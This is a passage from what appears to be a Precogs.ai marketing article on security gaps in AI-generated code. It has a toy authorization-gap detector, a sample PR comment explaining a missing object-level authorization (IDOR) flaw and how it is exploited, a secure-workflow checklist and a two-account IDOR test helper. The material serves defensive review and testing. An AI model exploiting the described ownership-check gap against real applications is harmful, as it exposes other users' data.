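The core of that idea is simple enough to show in miniature. The sketch below is our own toy illustration, not Precogs.ai's implementation: given endpoints grouped by pattern, any endpoint whose siblings perform an ownership check but which does not is reported as a likely gap.

```python
# Toy illustration of baseline modeling: flag endpoints that deviate from
# the access-control pattern their siblings follow. Our own construction.

def find_authz_gaps(endpoints: list) -> list:
    """endpoints: [{"path": str, "pattern": str, "has_ownership_check": bool}]"""
    by_pattern = {}
    for ep in endpoints:
        by_pattern.setdefault(ep["pattern"], []).append(ep)
    gaps = []
    for group in by_pattern.values():
        checked = sum(ep["has_ownership_check"] for ep in group)
        # Only a *mixed* group is suspicious: some endpoints check, some don't.
        if checked and checked < len(group):
            gaps += [ep["path"] for ep in group if not ep["has_ownership_check"]]
    return gaps
```

The real analysis derives `has_ownership_check` from the code itself rather than from annotations, but the deviation-from-baseline logic is the point: the AI-generated endpoint is flagged not against a universal rule, but against what your own codebase already does.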
14.4 PR-Level Security Review at AI Speed
Every pull request from a vibe coding session gets a Precogs.ai review posted as inline GitHub comments — before the code is merged, in the context where the developer is already looking at it.
[Precogs.ai] 🔴 HIGH — Missing Object-Level Authorization (CWE-639)
PR: feat/ai-dashboard — generated by Claude Code
Line 47: routes/dashboard.js
User-controlled parameter `req.params.userId` reaches
User.findById() without verification that req.user.id === req.params.userId.
This pattern was detected in 3 of 7 new endpoints in this PR.
Attack: Any authenticated user can access any other user's dashboard
by substituting a different userId in the URL.
Fix: Replace User.findById(req.params.userId) with
User.findById(req.user.id) — or add explicit ownership check.
[View all 3 affected endpoints →]
15. A Secure Vibe Coding Workflow
Vibe coding is not going away. The productivity gains are real. The right response is not to stop using AI tools — it is to build a workflow that closes the security gap between what the AI generates and what you ship.
┌─────────────────────────────────────────────────────────────────┐
│ SECURE VIBE CODING WORKFLOW │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. PROMPT WITH SECURITY REQUIREMENTS │
│ Include explicit security specs in every prompt │
│ Ask for self-review: "What are the security risks?" │
│ │
│ 2. VERIFY DEPENDENCIES BEFORE INSTALLING │
│ Check every suggested package exists legitimately │
│ Run: npm audit / pip-audit after AI adds dependencies │
│ Pin exact versions in requirements files │
│ │
│ 3. AUTOMATED SCAN ON EVERY COMMIT (Precogs.ai) │
│ SAST: injection, auth gaps, SSRF, misconfigurations │
│ Dependency: CVEs, hallucinated packages, supply chain │
│ Secrets: API keys, credentials in generated code │
│ │
│ 4. HUMAN REVIEW FOR SECURITY-SENSITIVE PATHS │
│ Authentication flows → always human review │
│ Payment/financial logic → always human review │
│ Database schema + access policies → always human review │
│ Infrastructure code → always human review │
│ │
│ 5. DYNAMIC TESTING BEFORE PRODUCTION │
│ Test auth bypass: remove token, use expired token │
│ Test IDOR: create two accounts, access each other's data │
│ Test business logic: negative quantities, zero prices │
│ Test security headers: securityheaders.com │
│ │
│ 6. MONITOR CONTINUOUSLY IN PRODUCTION (Precogs.ai) │
│ New CVEs in your dependencies → immediate alert │
│ Anomalous API traffic patterns → behavioral detection │
│ New shadow endpoints → API inventory drift detection │
│ │
└─────────────────────────────────────────────────────────────────┘
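Step 5's IDOR check is mechanical enough to automate in your test suite. The helper below is our own sketch, written against an injected `fetch` callable so it runs anywhere; in practice `fetch` would be an HTTP call (for example `requests.get` with each account's auth token) returning the status code.

```python
# Sketch of the two-account IDOR test from step 5 of the workflow above.
# `fetch(resource_id, token)` stands in for an authenticated HTTP GET
# and returns the response status code.

def idor_vulnerable(fetch, token_owner, token_other, resource_id) -> bool:
    """True if a non-owner can read the owner's resource."""
    status_owner = fetch(resource_id, token_owner)   # should be 200
    status_other = fetch(resource_id, token_other)   # should be 403/404
    return status_owner == 200 and status_other == 200
```

Run it over every object-bearing endpoint after each vibe coding session; the Tenzai data suggests missing object-level authorization is among the most common gaps in AI-generated endpoints, and this check costs minutes.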
16. Conclusion: The Vibe Is Not the Problem. The Gap Is.
The vibe coding security crisis is not evidence that AI coding tools are bad or that developers who use them are reckless. It is evidence that the security verification layer has not kept pace with the generation layer.
Applications built with vibe coding tools are no more inherently risky than applications built with traditional tools. The problem is that the vibe coding workflow encourages fast shipping without testing, and the default outputs of these tools reflect that pressure: code that works functionally but omits defensive patterns.
The gap is the problem. The gap between "AI generated it" and "we verified it is secure." The gap between "the tests pass" and "the authorization is correct." The gap between "it works in staging" and "it is safe in production."
Most security programs were built for a world where code moved at human speed. Vibe coding changes that: AI can generate, modify, and refactor code continuously, so security teams are no longer dealing with occasional bursts of change but with a constant, high-volume stream of it.
Precogs.ai closes the gap — operating at AI speed, with AI-aware analysis, built for the era of vibe coding. Because the future of software development is AI-assisted. And the future of security has to be too.
Scan Your Vibe-Coded Codebase
Get your first AI code security audit at precogs.ai →
Connect your repository in under 5 minutes. Get a prioritized report of the security gaps your AI assistant left behind — before an attacker finds them.
© 2026 Precogs.ai — AI-Native Application Security. All rights reserved.
Statistics in this article are sourced from Georgia Tech SSLab Vibe Security Radar (March 2026), Tenzai security research (December 2025), Escape.tech application scanning report (2025-2026), Carnegie Mellon AI code security study, and CodeRabbit production incident analysis (December 2025).
Tags: vibe-coding AI-generated-code code-security CVE Claude-Code Cursor Copilot OWASP injection SSRF supply-chain precogs-ai DevSecOps 2026
